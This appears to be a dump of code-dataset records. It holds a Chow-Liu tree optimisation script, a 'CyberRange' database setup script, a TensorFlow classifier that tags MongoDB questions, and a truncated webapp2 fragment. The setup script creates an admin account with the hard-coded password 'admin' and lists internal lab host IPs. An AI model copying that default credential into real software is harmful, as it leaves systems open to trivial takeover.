utilM.ve_tree_bin(R.topo_order, R.parents, cond_cpt_e)\n \n #cross_PlogR = util_opt.compute_cross_entropy_parm(pair_marginal_P,marginal_P, parents, topo_order, theta)\n for i in range (1, R.topo_order.shape[0]):\n cld = R.topo_order[i]\n par = R.parents[cld]\n \n val_c = evid_flag[cld]\n val_p = evid_flag[par]\n # both cld and par are not evid\n if val_c ==-1 and val_p ==-1:\n cross_entropy += np.sum(pair_marginal_P[cld, par] * np.log(cond_cpt_e[i]))\n # cld is evidence \n elif val_c !=-1 and val_p ==-1:\n cross_entropy += np.sum(marginal_P[cld] * np.log(cond_cpt_e[i,val_c,:]))\n # par is evidence \n elif val_c ==-1 and val_p !=-1:\n cross_entropy += np.sum(marginal_P[par] * np.log(cond_cpt_e[i,:,val_p]))\n # else both cld and par are evidence\n else:\n cross_entropy += np.log(cond_cpt_e[i,val_c,val_p])\n \n # root\n R_root = R.topo_order[0]\n val_root = evid_flag[R_root]\n # not evid\n if val_root == -1:\n R_root_marginal = np.array([cond_cpt_e[0,0,0], cond_cpt_e[0,1,1]])\n cross_entropy += np.sum(marginal_P[R_root]* np.log(R_root_marginal))\n else:\n cross_entropy += np.log(cond_cpt_e[0,val_root,val_root])\n #cross_entropy += 0\n #print (cond_cpt_e)\n \n #cross_entropy -= np.log(R_e)\n \n return cross_entropy\n \n\n# the objective function\ndef objective(x, clt_R, cpt_Q, marginal_P, pair_marginal_P, evid_list, non_evid_var, evid_flag):\n #print (marginal_P)\n #print (pair_marginal_P)\n \n n_variable = evid_flag.shape[0]\n lamda = x[0]\n theta = x[1:].reshape(n_variable,2,2)\n \n clt_R.cond_cpt = theta\n \n # get marginals:\n #marginal_R = get_single_var_marginals(topo_order, parents, theta)\n \n # first part\n cross_PlogR = cross_entropy_evid_parm(clt_R, marginal_P, pair_marginal_P, evid_list, non_evid_var, evid_flag)\n first_part = lamda*(cross_PlogR)\n \n #print ('first part: ', first_part)\n \n # second part:\n sec_part = (1.0-lamda)*(np.sum(cpt_Q *np.log(theta)))\n \n # maximize is the negation of minimize\n #print ('obj value: ', first_part+sec_part)\n return -(first_part+sec_part)\n \n \n \n# the derivative function\ndef derivative(x, clt_R, cpt_Q, marginal_P, pair_marginal_P, evid_list, non_evid_var, evid_flag):\n\n lamda = x[0]\n theta = x[1:].reshape(marginal_P.shape[0],2,2)\n n_variable = evid_flag.shape[0]\n \n \n clt_R.cond_cpt = theta\n #print (pair_marginal_P.shape)\n\n \n # derivative of lambda\n cross_PlogR = cross_entropy_evid_parm(clt_R, marginal_P, pair_marginal_P, evid_list, non_evid_var, evid_flag)\n der_lam = cross_PlogR - np.sum(cpt_Q *np.log(theta))\n \n # derivativ of thetas\n der_theta = np.zeros_like(theta)\n \n #cond_cpt_e = clt_R.instantiation(evid_list) 
\n jt_R = JT.JunctionTree()\n jt_R.learn_structure(clt_R.topo_order, clt_R.parents, clt_R.cond_cpt)\n\n \n #R_xy_evid = JT.get_marginal_JT(jt_R, evid_list, non_evid_var)\n R_xy_evid = JT.get_marginal_JT(jt_R, evid_list, np.arange(n_variable))\n# print (R_xy_evid)\n #p_xy_norm = Util.normalize2d(p_xy)\n #R_x_evid = np.zeros((non_evid_var.shape[0], 2))\n R_x_evid = np.zeros((n_variable, 2))\n #p_xy = mt_R.clt_list[c].inference(mt_R.clt_list[c].cond_cpt, ids)\n \n \n R_x_evid[:,0] = R_xy_evid[0,:,0,0] + R_xy_evid[0,:,1,0]\n R_x_evid[:,1] = R_xy_evid[0,:,0,1] + R_xy_evid[0,:,1,1] \n R_x_evid[0,0] = R_xy_evid[1,0,0,0] + R_xy_evid[1,0,1,0]\n R_x_evid[0,1] = R_xy_evid[1,0,0,1] + R_xy_evid[1,0,1,1]\n \n# print (R_x_evid)\n# sss\n \n R_xy_given_evid = Util.normalize2d(R_xy_evid)\n R_x_given_evid = Util.normalize1d(R_x_evid)\n \n# R_xy_given_evid_full = np.zeros((n_variable, n_variable, 2,2))\n# R_xy_given_evid_full[non_evid_var[:,None],non_evid_var] = R_xy_given_evid\n# R_x_given_evid_full = np.zeros((n_variable, 2))\n# R_x_given_evid_full[non_evid_var,:] = R_x_given_evid\n \n \n R_xy_given_evid_full = R_xy_given_evid\n R_x_given_evid_full = R_x_given_evid\n \n '''P(x,u|e)-R(x,u|e), where (x,u) is one edge in R, ordered in topo_order of R'''\n edge_marginal_diff = np.zeros_like(cpt_Q)\n for i in range (1,n_variable):\n cld = clt_R.topo_order[i]\n par = clt_R.parents[cld]\n \n val_c = evid_flag[cld]\n val_p = evid_flag[par]\n # both cld and par are not evid\n if val_c ==-1 and val_p ==-1:\n edge_marginal_diff[i] = pair_marginal_P[cld, par] *(1- R_xy_given_evid_full[cld, par])\n # cld is evidence \n elif val_c !=-1 and val_p ==-1:\n #print (R_x_given_evid_full[cld])\n edge_marginal_diff[i,val_c,:] = marginal_P[cld] *(1- R_x_given_evid_full[cld])\n # par is evidence \n elif val_c ==-1 and val_p !=-1:\n edge_marginal_diff[i,:, val_p] = marginal_P[par] *(1- R_x_given_evid_full[par])\n # else both cld and par are evidence\n else:\n edge_marginal_diff[i, val_c,val_p] = 0\n \n #edge_marginal_P[i+1] = pair_marginal_P[cld, pa]\n \n root = clt_R.topo_order[0] \n val_root = evid_flag[root]\n # not evid\n if val_root == -1:\n edge_marginal_diff[0,0,:] = marginal_P[root,0]* (1 - R_x_given_evid_full[root,0])\n edge_marginal_diff[0,1,:] = marginal_P[root,1]* (1 - R_x_given_evid_full[root,1])\n else:\n edge_marginal_diff = 0\n \n #edge_marginal_P[0,0,:] = marginal_P[root,0]\n #edge_marginal_P[0,1,:] = marginal_P[root,1]\n #print (edge_marginal_P)\n \n der_theta[:,:,:] = lamda*edge_marginal_diff/theta+(1.0-lamda)*(cpt_Q[:,:,:]/theta[:,:,:])\n \n #print (der_theta)\n\n '''Apply theta_{\\bar{b}|a} = 1-theta_{b|a}'''\n # root: special case\n der_theta[0,0,0] -= der_theta[0,1,1]\n der_theta[0,1,1] = -der_theta[0,0,0]\n der_theta[0,0,1] = der_theta[0,0,0] \n der_theta[0,1,0] = der_theta[0,1,1]\n\n der_theta[1:,0,:] -= der_theta[1:,1,:]\n der_theta[1:,1,:] = -der_theta[1:,0,:]\n \n #print ('---')\n #print (der_theta)\n\n \n\n der = np.zeros_like(x)\n der[0] = der_lam\n der[1:] = der_theta.flatten() \n \n return der *(-1.0)\n\n\n#'''\n#Update the parameters of R directly from P\n#'''\n#def update_S_use_P(P_pair,P_single, S):\n# return Util.compute_conditional_CPT(P_pair, P_single, S.topo_order, S.parents)\n\n\n#'''\n#Add noise to distribution pairwise marignals of P, single variable marginal of P\n#Which will cause sum_i Pair(i,j)!=Single(j)\n#But it is guarateed that sum Pair(i,j) = 1, Pair(i,j) and Pair(j,i) is related\n#'''\n#def add_noise (P_pair, P_single, noise_mu, noise_std, percent_noise=0.1):\n# \n# n_var = 
P_single.shape[0]\n# #percent_noise = 0.1\n# # how many potential function that has noise\n# \n# num_noise = int(n_var*percent_noise)\n# #noise_pair = np.random.choice(n_var*n_var*2*2, size=num_var_noise)\n# \n# #percent_noise = 1\n# #num_var_noise = int(n_var*n_var*2*2* percent_noise)\n# #noise_var = np.random.choice(n_var*n_var*2*2, size=num_var_noise)\n# \n# \n# pair_noise= np.random.normal(loc=noise_mu, scale=noise_std, size=(num_noise,2,2))\n# single_noise = np.random.normal(loc=noise_mu, scale=noise_std, size=(num_noise,2))\n#\n# #print (noise.shape)\n# \n# P_pair_noise = np.zeros_like(P_pair)\n# P_single_noise = np.zeros_like(P_single)\n# \n# \n# \n# \n# noise_seq = np.random.choice(num_edges, size=num_pair_noise)\n# #print ('noise_seq:', noise_seq)\n# \n# edges = []\n# for i in range (n_var):\n# for j in range(i+1, n_var):\n# edges.append([i,j])\n# \n# \n# Q_noise = np.copy(P)\n# \n# for k,s in enumerate(noise_seq):\n# \n# [i,j] = edges[s]\n# #print (i,j) \n# #print (P[i,j])\n# \n# '''apply noise'''\n# Q_noise[i,j] += noise[k]\n# \n# '''Set all value between [0.01 ~ 0.99]'''\n# Q_noise[i,j][Q_noise[i,j] < 0.01] = 0.01\n# Q_noise[i,j][Q_noise[i,j] > 0.99] = 0.99\n# \n# '''normalize'''\n# Q_noise[i,j] /= np.sum(Q_noise[i,j])\n# #print (Q_noise[i,j])\n# \n# '''symetric'''\n#\n# Q_noise[j,i,0,0] = Q_noise[i,j,0,0]\n# Q_noise[j,i,0,1] = Q_noise[i,j,1,0]\n# Q_noise[j,i,1,0] = Q_noise[i,j,0,1]\n# Q_noise[j,i,1,1] = Q_noise[i,j,1,1]\n# \n# #print (Q_noise[j,i])\n# \n#\n##\n## \n# return Q_noise\n\n\ndef main_opt_clt():\n# \n #dataset_dir = sys.argv[2]\n #data_name = sys.argv[4]\n \n #dataset_dir = '../../dataset/'\n #data_name = 'nltcs'\n blur_flag = True\n #n_components_P = 3\n #decimals = 2 # how many decimals left for distribution P\n #tum_module = data_name+'_'+str(n_components_P)\n dataset_dir = sys.argv[2]\n data_name = sys.argv[4]\n #n_components_P = int(sys.argv[6])\n mt_dir = sys.argv[6]\n perturb_rate = float(sys.argv[8])\n e_percent = float(sys.argv[10])\n \n tum_module = data_name\n n_samples = 100000\n #e_percent = 0.2\n blur_flag = True\n \n print('------------------------------------------------------------------')\n print('Construct CLT using optimization methods')\n print('------------------------------------------------------------------')\n \n \n #train_filename = sys.argv[1]\n train_filename = dataset_dir + data_name + '.ts.data'\n test_filename = dataset_dir + data_name +'.test.data'\n valid_filename = dataset_dir + data_name + '.valid.data'\n \n #out_file = '../module/' + data_name + '.npz'\n train_dataset = np.loadtxt(train_filename, dtype=int, delimiter=',')\n valid_dataset = np.loadtxt(valid_filename, dtype=int, delimiter=',')\n test_dataset = np.loadtxt(test_filename, dtype=int, delimiter=',')\n print (\"********* Using Validation / Test Dataset in distribtuion 'P' ************\")\n full_dataset = np.concatenate((train_dataset, valid_dataset), axis=0)\n full_dataset = np.concatenate((full_dataset, test_dataset), axis=0)\n \n n_variables = train_dataset.shape[1]\n \n #n_evids = int(np.round(n_variables * e_percent, decimals = 0))\n \n #rand_var = np.random.choice(n_variables, size=n_evids, replace=False)\n #rand_rec = np.random.randint(train_dataset.shape[0], size = 1)\n #print (rand_var)\n #print (rand_rec)\n\n# evids = np.zeros((n_evids,2), dtype = int)\n# evids[:,0] = np.array(rand_var)\n# #evids[:,0] = np.array([0,1,2])\n# evids[:,1] = np.array(train_dataset[rand_rec, rand_var])\n \n evids = util_opt.read_evidence_file('../evidence/', e_percent, 'nltcs')\n \n 
evid_var = evids[:,0]\n non_evid_var = np.setdiff1d(np.arange(n_variables), evid_var)\n evid_list = list(evids)\n \n evid_flag = np.full(n_variables,-1) #-1 means non evidence\n #evid_arr = np.asarray(evid_list)\n evid_flag[evids[:,0]] = evids[:,1] \n# print ('evid_flag:', evid_flag)\n# \n# print ('evid:')\n# print (evids)\n# print ('non evids:')\n# print (non_evid_var)\n# print ('evid_list', evid_list)\n \n #print (train_dataset[rand_rec])\n\n \n P_type = 'mt'\n \n if P_type == 'mt':\n '''\n ### Load the trained mixture of clt, consider as P\n '''\n print ('Start reloading MT...')\n #mt_dir = '../mt_output/'\n reload_mix_clt = load_mt(mt_dir, tum_module)\n non_evid_size = non_evid_var.shape[0]\n \n # Set information for MT\n for t in reload_mix_clt.clt_list:\n t.nvariables = non_evid_size\n # learn the junction tree for each clt\n jt = JT.JunctionTree()\n jt.learn_structure(t.topo_order, t.parents, t.cond_cpt)\n reload_mix_clt.jt_list.append(jt)\n \n # using mixture of trees as P\n model_P = reload_mix_clt\n \n #p_xy_all = np.zeros((non_evid_size, non_evid_size, 2, 2))\n #p_x_all = np.zeros((non_evid_size, 2))\n p_xy_all = np.zeros((n_variables, n_variables, 2, 2))\n p_x_all = np.zeros((n_variables, 2))\n for i, jt in enumerate(model_P.jt_list):\n p_xy = JT.get_marginal_JT(jt, evid_list, np.arange(n_variables))\n p_xy_all += p_xy * model_P.mixture_weight[i]\n\n #print (p_xy_all.shape)\n #print (p_xy_all)\n \n\n p_x_all[:,0] = p_xy_all[0,:,0,0] + p_xy_all[0,:,1,0]\n p_x_all[:,1] = p_xy_all[0,:,0,1] + p_xy_all[0,:,1,1]\n \n p_x_all[0,0] = p_xy_all[1,0,0,0] + p_xy_all[1,0,1,0]\n p_x_all[0,1] = p_xy_all[1,0,0,1] + p_xy_all[1,0,1,1]\n \n #print (p_x_all)\n\n # Normalize \n P_x_given_evid = Util.normalize1d(p_x_all)\n \n P_xy_given_evid = Util.normalize2d(p_xy_all)\n for i in xrange (non_evid_size):\n P_xy_given_evid[i,i,0,0] = p_x_all[i,0] - 1e-8\n P_xy_given_evid[i,i,1,1] = p_x_all[i,1] - 1e-8\n P_xy_given_evid[i,i,0,1] = 1e-8\n P_xy_given_evid[i,i,1,0] = 1e-8\n \n #P_xy_given_evid = Util.normalize2d(p_xy_all)\n else:\n \n print(\"Learning Chow-Liu Trees on full data ......\")\n clt_P = CLT()\n clt_P.learnStructure(full_dataset)\n \n #parents = clt_Q.parents # the structure of the tree is defined by the parents of each variables\n #topo_order = clt_Q.topo_order # the DFS order of the tree\n #cpt_Q = clt_Q.cond_cpt # The cpts of distribution Q\n \n \n # marginal_P = clt_P.xprob # the single marginals of P\n # # get the pairwise marginals of P\n # jt_P = JT.JunctionTree()\n # jt_P.learn_structure(clt_P.topo_order, clt_P.parents, clt_P.cond_cpt)\n # pair_marginal_P = JT.get_marginal_JT(jt_P, [], np.arange(n_variables))\n \n \n jt_P = JT.JunctionTree()\n jt_P.learn_structure(clt_P.topo_order, clt_P.parents, clt_P.cond_cpt)\n \n \n #P_xy_evid = JT.get_marginal_JT(jt_P, evid_list, non_evid_var)\n P_xy_evid = JT.get_marginal_JT(jt_P, evid_list, non_evid_var)\n \n #print (P_xy_evid.shape)\n #p_xy_norm = Util.normalize2d(p_xy)\n P_x_evid = np.zeros((non_evid_var.shape[0], 2))\n #p_xy = mt_R.clt_list[c].inference(mt_R.clt_list[c].cond_cpt, ids)\n \n P_x_evid[:,0] = P_xy_evid[0,:,0,0] + P_xy_evid[0,:,1,0]\n P_x_evid[:,1] = P_xy_evid[0,:,0,1] + P_xy_evid[0,:,1,1] \n P_x_evid[0,0] = P_xy_evid[1,0,0,0] + P_xy_evid[1,0,1,0]\n P_x_evid[0,1] = P_xy_evid[1,0,0,1] + P_xy_evid[1,0,1,1]\n \n \n # normalize\n P_xy_given_evid = Util.normalize2d(P_xy_evid)\n P_x_given_evid = Util.normalize1d(P_x_evid)\n \n #print (P_x_given_evid)\n \n # Use half of the training data to bulid Q\n #half_data = 
train_dataset[:int(train_dataset.shape[0]/10),:]\n half_data = np.minimum(train_dataset[:int(train_dataset.shape[0]/10),:],1000)\n clt_Q = CLT()\n clt_Q.learnStructure(half_data)\n \n clt_Q.cond_cpt = pertub_model(clt_Q, model_type='clt', percent=perturb_rate)\n \n # Initialize R as P\n clt_R = copy.deepcopy(clt_Q)\n \n \n# '''test'''\n# #P_P = cross_entropy_evid(clt_P, clt_P, list(evids), non_evid_var)\n# P_R = cross_entropy_evid(clt_P, clt_R, list(evids), non_evid_var)\n# #print ('P||P:', P_P)\n# print ('P||R:', P_R)\n# \n# P_xy_given_evid_full = np.zeros((n_variables, n_variables, 2,2))\n# #print (P_xy_evid_full[non_evid_var[:,None],non_evid_var].shape)\n# P_xy_given_evid_full[non_evid_var[:,None],non_evid_var] = P_xy_given_evid\n# P_x_given_evid_full = np.zeros((n_variables, 2))\n# P_x_given_evid_full[non_evid_var,:] = P_x_given_evid\n# P_e = np.sum(P_x_evid[0,:])\n# P_R2 = cross_entropy_evid_parm(clt_R, P_x_given_evid_full, P_xy_given_evid_full, evid_list, non_evid_var, evid_flag)\n# print ('P||R:', P_R2*P_e)\n# ss\n \n\n #print( np.sum(clt_P.getWeights(test_dataset)) / test_dataset.shape[0])\n #print( np.sum(clt_Q.getWeights(test_dataset)) / test_dataset.shape[0])\n #print( np.sum(clt_R.getWeights(test_dataset)) / test_dataset.shape[0])\n \n\n\n\n# '''test'''\n# # using extremetly simple example (a chain) to test\n# nvariables = 3\n# topo_order = np.array([0,1,2])\n# parents = np.array([-9999,0,1]) \n# cpt_Q = np.zeros((3,2,2))\n# cpt_Q[0,0,0] = 0.3\n# cpt_Q[0,0,1] = 0.3\n# cpt_Q[0,1,0] = 0.7\n# cpt_Q[0,1,1] = 0.7\n# cpt_Q[1,0,0] = 0.2\n# cpt_Q[1,0,1] = 0.4\n# cpt_Q[1,1,0] = 0.8\n# cpt_Q[1,1,1] = 0.6\n# cpt_Q[2,0,0] = 0.3\n# cpt_Q[2,0,1] = 0.1\n# cpt_Q[2,1,0] = 0.7\n# cpt_Q[2,1,1] = 0.9\n# \n# \n# marginal_P = np.zeros((3,2))\n# marginal_P[0,0]=0.3\n# marginal_P[0,1]=0.7\n# marginal_P[1,0]=0.34\n# marginal_P[1,1]=0.66\n# marginal_P[2,0]=0.168\n# marginal_P[2,1]=0.832\n# \n# \n# cpt_R = np.copy(cpt_Q)\n# cpt_R[0,0,0] = 0.6\n# cpt_R[0,0,1] = 0.6\n# cpt_R[0,1,0] = 0.4\n# cpt_R[0,1,1] = 0.4\n# cpt_R[1,0,0] = 0.8\n# cpt_R[1,0,1] = 0.7\n# cpt_R[1,1,0] = 0.2\n# cpt_R[1,1,1] = 0.3\n# cpt_R[2,0,0] = 0.55\n# cpt_R[2,0,1] = 0.9\n# cpt_R[2,1,0] = 0.45\n# cpt_R[2,1,1] = 0.1\n# '''test end'''\n# \n\n \n \n # bulid the junction tree\n #jt = JT.JunctionTree()\n #jt.learn_structure(topo_order, parents, cpt_R)\n \n cpt_Q = clt_Q.cond_cpt\n cpt_R = clt_R.cond_cpt\n \n #args = (jt, topo_order, parents, cpt_Q, marginal_P)\n #marginal_P_blur = np.round(marginal_P, decimals = decimals)\n #pair_marginal_P_blur = np.round(pair_marginal_P, decimals = decimals)\n \n \n if blur_flag == True:\n '''apply noise to P'''\n \n '''\n Get the noise\n '''\n noise_mu = 0\n noise_std = 0.01\n noise_percent = 1\n \n# print ('dataset: ', data_name)\n# print ('mu: ', noise_mu)\n# print ('std: ', noise_std)\n# print ('percent: ', noise_percent)\n \n P_xy_given_evid_blur = util_opt.add_noise (P_xy_given_evid, n_variables, noise_mu, noise_std, percent_noise=noise_percent)\n \n #print (P_xy_given_evid.shape)\n #print (P_xy_given_evid_blur.shape)\n\n #marginal_P_blur = marginal_P\n #print (P_xy_given_evid_blur[0])\n P_xy_given_evid_full = P_xy_given_evid_blur\n P_x_given_evid_full = P_x_given_evid\n \n \n \n# P_xy_given_evid_full = np.zeros((n_variables, n_variables, 2,2))\n# #print (P_xy_evid_full[non_evid_var[:,None],non_evid_var].shape)\n# P_xy_given_evid_full[non_evid_var[:,None],non_evid_var] = P_xy_given_evid_blur\n# P_x_given_evid_full = np.zeros((n_variables, 2))\n# P_x_given_evid_full[non_evid_var,:] = P_x_given_evid\n 
\n \n \n #print (P_xy_given_evid_full[0])\n #print (P_x_given_evid_full)\n \n #args = (clt_R.topo_order, clt_R.parents, cpt_Q, P_x_given_evid_full, P_xy_given_evid_full, evid_list, non_evid_var)\n else:\n \n# P_xy_given_evid_full = np.zeros((n_variables, n_variables, 2,2))\n# #print (P_xy_evid_full[non_evid_var[:,None],non_evid_var].shape)\n# P_xy_given_evid_full[non_evid_var[:,None],non_evid_var] = P_xy_given_evid\n# P_x_given_evid_full = np.zeros((n_variables, 2))\n# P_x_given_evid_full[non_evid_var,:] = P_x_given_evid\n \n \n #args = (clt_R.topo_order, clt_R.parents, cpt_Q, marginal_P, pair_marginal_P)\n \n P_xy_given_evid_full = P_xy_given_evid\n P_x_given_evid_full = P_x_given_evid\n \n \n \n \n args = (clt_R, cpt_Q, P_x_given_evid_full, P_xy_given_evid_full, evid_list, non_evid_var, evid_flag)\n \n # set the bound for all variables\n bnd = (0.001,0.999)\n bounds = [bnd,]*(4*n_variables+1)\n \n x0 = np.zeros(4*n_variables+1)\n x0[0] = 0.5 # initial value for lamda\n x0[1:] = cpt_R.flatten()\n \n # constraint: valid prob\n normalize_cons = []\n for i in range (n_variables):\n \n# print (x0[i*4+1]+ x0[i*4+3])\n# print (x0[i*4+2]+ x0[i*4+4])\n \n normalize_cons.append({'type': 'eq',\n 'fun' : lambda x: np.array([x[i*4+1] + x[i*4+3] - 1, \n x[i*4+2] + x[i*4+4] - 1])})\n \n \n #print (x0)\n \n #res = minimize(objective, x0, method='SLSQP', jac=derivative, constraints=normalize_cons, # with normalization constriant\n res = minimize(objective, x0, method='SLSQP', jac=derivative, # without normalization constraint\n options={'ftol': 1e-4, 'disp': True, 'maxiter': 1000},\n bounds=bounds, args = args)\n clt_R.cond_cpt = res.x[1:].reshape(n_variables,2,2)\n clt_R.log_cond_cpt = np.log(clt_R.cond_cpt)\n \n #print (res.x[1:])\n# print ('P:')\n# print (clt_P.cond_cpt.flatten())\n# print ('Q:')\n# print(cpt_Q.flatten())\n# print ('R:') \n# print (clt_R.cond_cpt.flatten())\n\n# bnd = (0,1)\n# bounds = [bnd,]*2\n# x0 = np.array([0.5, 0])\n# res = minimize(objective, x0, method='SLSQP', jac=derivative,\n# options={'ftol': 1e-6, 'disp': True, 'maxiter': 1000},\n# bounds=bounds)\n \n \n \n print ('------Cross Entropy-------')\n \n if P_type == 'mt':\n# P_xy_given_evid_full = np.zeros((n_variables, n_variables, 2,2))\n# P_xy_given_evid_full[non_evid_var[:,None],non_evid_var] = P_xy_given_evid\n# P_x_given_evid_full = np.zeros((n_variables, 2))\n# P_x_given_evid_full[non_evid_var,:] = P_x_given_evid\n# \n# P_Q = cross_entropy_evid_parm(clt_Q, P_x_given_evid_full, P_xy_given_evid_full, evid_list, non_evid_var, evid_flag)\n# P_R = cross_entropy_evid_parm(clt_R, P_x_given_evid_full, P_xy_given_evid_full, evid_list, non_evid_var, evid_flag)\n \n samples = util_opt.sample_from_mt_evid_posterior(model_P, n_samples, evids, non_evid_var)\n #print (clt_Q.getWeights(samples))\n #print (clt_R.getWeights(samples))\n \n P_Q = compute_cross_entropy_mt_sampling_evid(clt_Q, samples, evid_list)\n P_R = compute_cross_entropy_mt_sampling_evid(clt_R, samples, evid_list)\n else: # P is tree\n P_P = cross_entropy_evid(clt_P, clt_P, evid_list, non_evid_var)\n P_Q = cross_entropy_evid(clt_P, clt_Q, evid_list, non_evid_var)\n P_R = cross_entropy_evid(clt_P, clt_R, evid_list, non_evid_var)\n print ('P||P:', P_P)\n print ('P||Q:', P_Q)\n print ('P||R:', P_R)\n \n #return P_Q, P_R\n \n output_rec = np.array([P_Q, P_R])\n #print (output_rec.shape)\n output_file = '../output_results/'+data_name+'/clt_e_'+str(e_percent) +'_'+str(perturb_rate)\n with open(output_file, 'a') as f_handle:\n #print (\"hahah\")\n np.savetxt(f_handle, 
output_rec.reshape(1,2), fmt='%f', delimiter=',')\n# print ('P||P:', util_opt.compute_KL(pair_marginal_P, marginal_P, clt_P))\n# print ('P||Q:', util_opt.compute_KL(pair_marginal_P, marginal_P, clt_Q))\n# print ('P||R:', util_opt.compute_KL(pair_marginal_P, marginal_P, clt_R))\n \n# clt_S = copy.deepcopy(clt_Q)\n# if blur_flag ==True:\n# '''apply noise to P'''\n# clt_S.cond_cpt = update_S_use_P(pair_marginal_P_blur,marginal_P_blur, clt_S)\n# else:\n# clt_S.cond_cpt = update_S_use_P(pair_marginal_P,marginal_P, clt_S)\n# print ('P||S:', util_opt.compute_KL(pair_marginal_P, marginal_P, clt_S))\n\n\nif __name__==\"__main__\":\n\n# start = time.time()\n# main_opt_clt()\n# print ('Total running time: ', time.time() - start)\n\n# start = time.time()\n# n_times = 5\n# Q_arr = np.zeros(n_times)\n# R_arr = np.zeros(n_times)\n# for i in range (n_times):\n# Q_arr[i], R_arr[i] = main_opt_clt('nltcs', 0.0)\n# \n# print ('avg P||Q:', np.sum(Q_arr)/n_times)\n# print ('avg P||R:', np.sum(R_arr)/n_times)\n# print ('Total running time: ', time.time() - start)\n start = time.time()\n main_opt_clt()\n print ('Total running time: ', time.time() - start)","sub_path":"opt_clt_ss_evid.py","file_name":"opt_clt_ss_evid.py","file_ext":"py","file_size_in_byte":36733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"31991129","text":"import os\nimport sys\nimport random\nimport transaction\n\nfrom sqlalchemy import engine_from_config\n\nfrom pyramid.paster import (\n get_appsettings,\n setup_logging,\n )\n\n#from pyramid.scripts.common import parse_vars\n\nfrom cyberrange.models.core import (\n DBSession,\n Base,\n GlobalConfigs\n )\nfrom cyberrange.models.admin import (\n User,\n Group\n )\n\ndef usage(argv):\n cmd = os.path.basename(argv[0])\n print('usage: %s [var=value]\\n'\n '(example: \"%s development.ini\")' % (cmd, cmd))\n sys.exit(1)\n\n\ndef main(argv=sys.argv):\n if len(argv) < 2:\n usage(argv)\n config_uri = argv[1]\n #options = parse_vars(argv[2:])\n setup_logging(config_uri)\n #settings = get_appsettings(config_uri, options=options)\n settings = get_appsettings(config_uri)\n engine = engine_from_config(settings, 'sqlalchemy.')\n DBSession.configure(bind=engine)\n Base.metadata.create_all(engine)\n with transaction.manager:\n # Create the groups for two types of users (for now)\n auth_group = Group(u'auth', u'Regular user account.')\n admin_group = Group(u'admin', u'Administrative user account.')\n\n # Add them to the db session\n DBSession.add(auth_group)\n DBSession.add(admin_group)\n transaction.commit()\n\n # Create the admin user so we can always access the system as admin.\n su = User(first_name=u'Ixia', last_name=u'User', username=u'admin',\n email=u'admin@ixiacom.com', mobile=random.randint(2140000000, 2149999999))\n su._set_password('admin')\n su.groups.append(admin_group)\n DBSession.add(su)\n transaction.commit()\n\n # Configure global system parameters.\n config = GlobalConfigs(bps=u'192.168.0.132', metasploit=u'192.168.0.150', splunk=u'192.168.0.133',\n ips=u'', ngfw=u'192.168.0.134', dlp=u'192.168.0.140',\n windows=u'192.168.0.132', kali=u'192.168.0.170', atip=u'192.168.0.171', version=u'01.00.00')\n DBSession.add(config)\n transaction.commit()","sub_path":"CyberRange/cyberrange/scripts/initializedb.py","file_name":"initializedb.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"332265725","text":"import tensorflow as tf\nimport numpy as 
np\nimport os\nfrom tensorflow.contrib import learn\nfrom com.alodokter.cnn import data_helpers\n\nimport pymongo\nfrom pymongo import MongoClient\n\n# ===============================================================================================================\ntf.flags.DEFINE_string(\"checkpoint_dir\", \"runs/1501761743/checkpoints\", \"Checkpoint directory from training run\")\ntf.flags.DEFINE_boolean(\"allow_soft_placement\", True, \"Allow device soft device placement\")\ntf.flags.DEFINE_boolean(\"log_device_placement\", False, \"Log placement of ops on devices\")\n\nFLAGS = tf.flags.FLAGS\nFLAGS._parse_flags()\nprint(\"\\nParameters:\")\nfor attr, value in sorted(FLAGS.__flags.items()):\n print(\"{}={}\".format(attr.upper(), value))\nprint(\"\")\n# ===============================================================================================================\n\nclass TextClassifier:\n def __init__(self):\n data_helpers.setup_one_hot_encoder_class('corpus/interest/')\n\n # Map data into vocabulary\n vocab_path = os.path.join(FLAGS.checkpoint_dir, \"..\", \"vocab\")\n self.vocab_processor = learn.preprocessing.VocabularyProcessor.restore(vocab_path)\n\n checkpoint_file = tf.train.latest_checkpoint(FLAGS.checkpoint_dir)\n graph = tf.Graph()\n with graph.as_default():\n session_conf = tf.ConfigProto(\n allow_soft_placement=FLAGS.allow_soft_placement,\n log_device_placement=FLAGS.log_device_placement)\n self.sess = tf.Session(config=session_conf)\n with self.sess.as_default():\n # Load the saved meta graph and restore variables\n saver = tf.train.import_meta_graph(\"{}.meta\".format(checkpoint_file))\n saver.restore(self.sess, checkpoint_file)\n\n # Get the placeholders from the graph by name\n self.input_x = graph.get_operation_by_name(\"input_x\").outputs[0]\n self.dropout_keep_prob = graph.get_operation_by_name(\"dropout_keep_prob\").outputs[0]\n self.scores = graph.get_operation_by_name(\"output/scores\").outputs[0]\n self.predictions = graph.get_operation_by_name(\"output/predictions\").outputs[0]\n\n def predict(self, text, confidence_level=0):\n x = np.array(list(self.vocab_processor.transform([data_helpers.clean_str(text)])))\n logits = tf.nn.softmax(self.scores)\n output, probability = self.sess.run([self.predictions, logits], {self.input_x: x, self.dropout_keep_prob: 1.0})\n if probability[0][output[0]] >= confidence_level:\n return data_helpers.get_class_name(output[0])\n else:\n return 'None'\n\n def tagging(self):\n client = MongoClient('[server ip]', 27017)\n db = client.alomobile\n client.alomobile.authenticate('[username]', '[password]', mechanism='SCRAM-SHA-1')\n\n questions = db.questions.find({ '_type': 'Core::Question' })\n for question in questions:\n text = question['title'] +' '+ question['content']\n print(text)\n prediction_interest = self.predict(text)\n print('tagging '+ str(question['_id']) +' with '+ prediction_interest)\n db.questions.update( { '_id': question['_id'] }, {\"$set\": { 'interest': prediction_interest }}, upsert=False )\n print('')\n","sub_path":"com/alodokter/rnn/rnn_classifier.py","file_name":"rnn_classifier.py","file_ext":"py","file_size_in_byte":3400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"496452943","text":"import webapp2\n# from oauth2client.appengine import OAuth2Decorator\nimport csv\nfrom models import FeedbackEntity\nimport logging\nimport cStringIO\nimport codecs\nfrom dateutil import tz\nfrom google.appengine.api import users\nfrom oauth2client.appengine import 
